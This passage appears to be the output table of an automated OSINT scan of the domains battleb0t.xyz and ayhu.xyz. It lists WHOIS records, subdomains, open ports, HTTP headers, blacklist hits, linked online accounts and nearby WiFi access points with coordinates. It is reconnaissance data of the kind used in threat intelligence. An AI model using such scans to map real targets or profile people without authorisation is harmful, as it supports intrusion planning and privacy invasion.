"{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Germany | Frankfurt am Main, Hesse, 60306, Germany, Europe |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:E5:E0:81) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:09:F8:70) | 37.780462,-122.390564 |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.171): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0031.github.io |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | The Batcave (Net ID: 00:11:32:A4:B5:6D) | 50.8897, 6.0563 |
| 2023-05-12 02:44:06 | Domain Whois | No | Whois | 14 | 0 | 1 | 0 | None | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
| ayhu.xyz |
| 2023-05-12 03:18:53 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Rotated 90 CW @ 18} | https://funny.battleb0t.xyz/images/withat_4.jpg |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.120 | 35.229.48.116 |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.32): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:32:18 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 4 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-110-154.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-110-154.github.com |
| 2023-05-12 02:54:30 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Server: nginx
Date: <REDACTED>
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"64217dc5-156"
Content-Encoding: gzip
| 64.226.81.43 |
| 2023-05-12 02:44:09 | Co-Hosted Site | No | SSL Certificate Analyzer | 2 | 1 | 1 | 0 | None | github.io | battleb0t.xyz |
| 2023-05-12 02:45:02 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 2606:50c0:8002::153 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5ee2a62d9a2306-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 02:54:13 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | text/html;charset=utf-8 | https://ayhu.xyz/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | MCName (Minecraft) (Category: gaming)
https://mcname.info/en/search?q=ayhu | ayhu |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES_RT-205 (Net ID: 00:12:BF:3D:DD:C5) | 40.2024, 29.0398 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | GitHub (Category: coding)
https://github.com/ayshoo | ayshoo |
| 2023-05-12 03:28:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.144:8080 | 188.114.96.0/24 |
| 2023-05-12 03:31:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | abuse@godaddy.com | Domain Name: 001VIET.COM
Registry Domain ID: 2685910837_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-10-01T07:27:47Z
Creation Date: 2022-03-31T20:18:54Z
Registry Expiry Date: 2024-03-31T20:18:54Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: NS35.DOMAINCONTROL.COM
Name Server: NS36.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:05Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: 001viet.com
Registry Domain ID: 2685910837_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-03-31T15:18:54Z
Creation Date: 2022-03-31T15:18:54Z
Registrar Registration Expiration Date: 2024-03-31T15:18:54Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Name Server: NS35.DOMAINCONTROL.COM
Name Server: NS36.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:44:10 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 1 | 0 | None | github.io | battleb0t.xyz |
| 2023-05-12 02:44:22 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | United States | 172.67.135.9 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:01:E6:93:CF:EC) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:35 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Google Analytics | fluid.battleb0t.xyz |
| 2023-05-12 02:57:24 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | tiktok.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00088.github.io | 185.199.111.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | 1136 4120 (Net ID: 00:0F:CC:76:66:44) | 32.8608, -79.9746 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 03:37:16 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | Northbrook, United States | 165.232.113.85 |
| 2023-05-12 02:44:18 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | funny.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'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', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'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', 
u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'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', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 03:10:37 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.108.154:443 | 185.199.108.0/24 |
| 2023-05-12 03:03:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:7b:a3:67:f4:76:b8:d0:86:bd:aa:81:68:7c:78:c6:53:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 18:07:07 2022 GMT
Not After : Mar 13 18:07:06 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:f3:5c:50:fa:14:e0:3f:8b:c6:63:22:13:37:d5:
cb:b8:bd:8b:1e:a5:6b:3e:a7:72:86:59:28:5c:40:
8b:1c:f8:2f:50:4b:f5:ef:0d:c5:e9:de:f9:20:da:
78:1c:0d:66:f9:dc:3f:93:0b:74:ad:7f:b2:a1:7a:
56:57:3c:77:28:5a:1a:58:66:08:52:f6:b9:f7:00:
cb:6d:f6:d8:ce:be:b0:7d:24:54:62:4e:58:7b:85:
b9:a9:b7:ac:6a:8d:99:a5:06:fd:0d:b0:88:77:c4:
1e:ca:a9:28:8a:9d:40:a2:d0:47:0a:5a:ad:c2:3d:
86:b0:bc:4e:c3:7b:51:cd:65:3e:10:7e:3b:3a:f9:
c4:70:b5:67:78:ac:bb:4f:31:b9:51:1b:63:89:e0:
2e:5b:c6:8b:52:39:42:6a:aa:6d:6c:72:68:d0:4f:
7c:c9:6a:0a:9c:f8:75:aa:50:d4:8d:ce:7f:ca:28:
87:8a:b7:bc:e2:04:a3:9b:bd:0d:fe:95:0c:de:fb:
3a:e4:bd:4d:5a:d2:f2:ba:0e:54:6d:82:9a:5c:f9:
ee:f6:a3:1e:93:71:37:5f:83:bf:08:49:75:e7:cf:
fc:13:fc:3c:21:17:a8:95:ac:1a:b0:0b:09:b4:ce:
a6:d7:8e:cb:8b:5e:2f:81:f3:69:1e:af:dd:1c:d1:
d3:27
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BE:C4:2E:77:A7:91:6D:C0:9E:C0:E1:04:BD:9C:50:CA:0E:A6:9A:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 19:07:08.083 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D0:FF:78:AE:C3:62:89:90:F2:A9:F6:
CF:41:A5:B6:AB:51:6D:6E:FB:5E:D8:9D:88:9E:50:39:
26:BD:EC:AC:34:02:21:00:BC:89:FB:E2:F1:35:F7:00:
0B:4C:4C:DE:C4:12:88:E0:4F:52:7D:18:21:0D:AC:62:
BC:76:DD:A2:F8:3F:5B:1D
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 13 19:07:08.583 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:51:94:B0:CF:3C:86:38:A4:D9:80:6F:E3:
EC:3D:37:CB:B4:65:E2:35:17:5E:BA:96:76:F4:A6:90:
1D:6A:AE:4B:02:21:00:9D:89:ED:FC:FA:3F:52:5C:6A:
FF:DA:D2:C4:54:F3:CB:81:7B:1B:4B:4F:01:26:9F:C1:
04:B7:D6:CE:B9:77:B8
Signature Algorithm: sha256WithRSAEncryption
91:4e:e2:bf:36:57:41:de:a3:6f:91:fb:a2:73:ec:c8:9e:f7:
1f:0d:59:7b:c6:09:e3:fb:bf:a4:c2:8a:32:fa:c4:f6:df:3f:
aa:05:e0:24:98:16:08:84:62:26:41:b9:6f:39:f4:71:d6:ee:
5c:b1:36:f4:e8:21:c1:33:ce:b6:3c:af:4d:e7:18:2f:6c:27:
6e:cd:40:66:5d:d7:bd:71:74:93:04:96:39:63:25:d2:be:99:
3b:37:81:f8:a4:eb:0b:81:a4:3b:25:e3:9f:76:85:e0:0f:1a:
92:b6:27:46:71:61:51:3a:f7:5d:72:65:00:9d:09:05:5c:de:
c1:d4:54:d5:5a:d7:d7:34:d4:2c:67:0d:f8:a4:f0:c4:3a:47:
80:3c:8b:81:06:a8:34:d6:42:45:55:c8:42:f9:cf:43:4d:ee:
bd:e9:55:d7:d8:77:a3:d9:4c:76:08:4a:3c:a8:97:42:30:c9:
07:48:ea:bf:5e:b8:93:d2:56:00:0f:04:1c:00:01:69:ac:de:
20:d1:8a:7a:88:01:7c:94:e0:3d:d3:30:5e:a9:3c:d3:38:56:
5b:30:14:08:f5:b9:a1:f9:56:6c:72:be:02:ce:ad:d8:53:46:
35:20:ba:70:c5:77:bf:fa:4e:08:fb:a6:cd:30:77:f4:dc:52:
90:b6:5b:91
|
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00d.github.io | 185.199.111.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | FruityWifi-003 (Net ID: 00:07:0E:65:CF:39) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | james-gamboa.github.io | 185.199.108.153 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:443 | 172.67.135.9 |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 137.97.148.34.bc.googleusercontent.com | 34.148.97.137 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Je buurman (Net ID: 00:01:71:0C:63:FC) | 52.3759, 4.8975 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomD04238 (Net ID: 00:0C:F6:D0:42:38) | 50.8897, 6.0563 |
